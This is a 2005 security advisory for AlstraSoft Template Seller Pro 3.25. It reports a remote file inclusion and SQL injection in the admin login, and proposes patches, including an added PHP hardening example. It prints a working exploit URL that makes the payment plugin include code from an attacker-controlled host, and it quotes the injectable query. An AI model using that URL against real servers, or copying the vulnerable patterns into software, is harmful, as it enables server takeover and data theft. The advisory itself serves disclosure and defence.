
Template Seller Pro 3.25



AlstraSoft Template Seller Pro 3.25 
===================================

   Software: AlstraSoft Template Seller Pro 3.25
   Severity: Arbitrary code execution, SQL Injection(s)
   Risk: High
   Author: Robin Verton <r.verton@xxxxxxxxx>
   Date: Nov. 15 2005
   Vendor: www.alstrasoft.com


   Description:

        Ever thought of starting your very own profitable shopping cart
        business just like TemplateMonster.com? With AlstraSoft Template
        Seller Pro software, you can run your own templates store selling
        templates such as website templates, logo templates, flash intro
        templates, frontpage templates and many more! The flexibility of
        Template Seller Pro software also allows you to run a membership
        based templates business just like BoxedArt.com by offering paid
        members multiple templates download instantly.
        [http://www.alstrasoft.com/]


   Details:

        1) /include/paymentplugins/payment_paypal.php

          /**
          Paypal payment plugin
          */
          global $config,$conn;
          include("$config[basepath]/include/payment/class.paypal_ipn.php");
          include("$config[basepath]/include/paymentplugins/paymentplugin.php");

           
          If register_globals is on, $config[basepath] can be supplied in the
          request, so we can include and execute any PHP code of our choice.
          This is very dangerous: if safe_mode is off and there are no
          restrictions on command execution, an attacker can gain access to
          every file on the server.

          
http://www.example.com/include/paymentplugins/payment_paypal.php?config[basepath]=http://youhost.com/our-code.txt?

          Because of the trailing '?', the '/include/payment/class.paypal_ipn.php'
          part of the include statement is passed as a query-string parameter
          to the our-code.php script, so only the script we set in
          $config[basepath] is included.

        2) /admin/index.php

          $sql_user_name = $user_name;
          $md5_pass = md5($user_pass);

          $sql = "SELECT * FROM UserDB WHERE user_name='$sql_user_name' and user_password='$md5_pass'";

          The user-submitted value for the username is inserted into the
          query without any validation. Because of this we can inject
          arbitrary SQL into the statement.

        Nearly NO user-submitted variable is validated, so a few more
        SQL injections are possible.

   Patch:
          Define a constant (e.g. IN_SYS) in the entry script and add the
          following check to each included file to prevent such attacks

          if( !defined('IN_SYS') ) {
                die('Hacking Attempt!');
          }

          and activate magic_quotes_gpc
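
          The following is an added illustration of how both findings above
          (the $config[basepath] include in 1) and the admin login query in 2))
          can be hardened; it is not AlstraSoft's code. The table and column
          names (UserDB, user_name, user_password) come from the advisory;
          the file layout, the use of PDO and the admin_login() helper are
          assumptions.

```php
<?php
// Added example, not part of Template Seller Pro. Assumes PHP with PDO and
// that UserDB stores md5() hashes in user_password, as the advisory shows.

// --- entry script (e.g. admin/index.php) ---------------------------------
define('IN_SYS', true);                 // marker every included file checks

// Derive the base path from the file system instead of trusting $config,
// so a request carrying ?config[basepath]=http://... has no effect even
// when register_globals is on.
$config = array();
$config['basepath'] = dirname(__DIR__); // assumed layout: admin/ under project root

// --- top of every included file (e.g. payment_paypal.php) -----------------
// The guard from the Patch section: a direct request to the include never
// went through the entry script, so IN_SYS is undefined and we stop here.
if (!defined('IN_SYS')) {
    die('Hacking Attempt!');
}

// --- admin login: bound parameter instead of string interpolation ---------
function admin_login(PDO $db, $user_name, $user_pass)
{
    // The user name is sent as a bound value; it can never become SQL text,
    // so the injection from finding 2) is closed without magic_quotes_gpc.
    $stmt = $db->prepare('SELECT user_password FROM UserDB WHERE user_name = ?');
    $stmt->execute(array($user_name));
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false;                   // unknown user
    }
    // Compare against the stored md5() hash in constant time. Migrating the
    // column to password_hash()/password_verify() is the better long-term fix.
    return hash_equals($row['user_password'], md5($user_pass));
}
```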
  
   Credits:

        Credit goes to Robin Verton

   References:

        [1] http://www.alstrasoft.com/template.htm
        [2] http://myblog.it-security23.net